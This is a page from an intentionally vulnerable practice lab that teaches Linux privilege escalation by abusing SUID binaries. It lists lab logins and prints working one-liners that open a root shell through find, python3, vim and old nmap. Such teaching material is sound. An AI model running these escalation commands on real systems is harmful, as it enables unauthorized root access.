🐧 Linux Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
Home Login SUID Binaries Sudo Misconfig Cron Jobs PATH Hijack Writable /etc/passwd Env Variables
⚠️ Pracivo Security Lab — Linux privilege escalation techniques. Start as a low-privilege user and escalate to root.
Lab Credentials: ram / pracivo  |  alice / alice123  |  root / toor (goal: escalate to this)

SUID Binary Abuse

PRIVILEGE ESCALATION

SUID (Set User ID) binaries run with the permissions of their owner, not the user executing them. If a SUID binary is owned by root and can be abused, you get root. 

# Step 1: Find all SUID binaries on the system
find / -perm -u=s -type f 2>/dev/null

# Common output on a vulnerable machine:
-rwsr-xr-x 1 root root /usr/bin/passwd
-rwsr-xr-x 1 root root /usr/bin/sudo
-rwsr-xr-x 1 root root /usr/bin/find       ← DANGEROUS
-rwsr-xr-x 1 root root /usr/bin/vim        ← DANGEROUS
-rwsr-xr-x 1 root root /usr/bin/python3    ← DANGEROUS
-rwsr-xr-x 1 root root /usr/local/bin/nmap ← DANGEROUS

# Step 2: Check GTFOBins for each binary
# GTFOBins: https://gtfobins.github.io/

# Exploit: /usr/bin/find with SUID
find . -exec /bin/sh -p \; -quit
# -p flag preserves EUID (root)

# Exploit: /usr/bin/python3 with SUID
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# Exploit: /usr/bin/vim with SUID
vim -c ':!/bin/sh'

# Exploit: /usr/bin/nmap (old version, has --interactive)
nmap --interactive
!sh

# After exploitation: verify you are root
id
# uid=0(root) gid=0(root) groups=0(root)
✅ Practice: On a real Linux VM, run the find command and check each result on GTFOBins. Every pentest engagement checks for SUID misconfigs.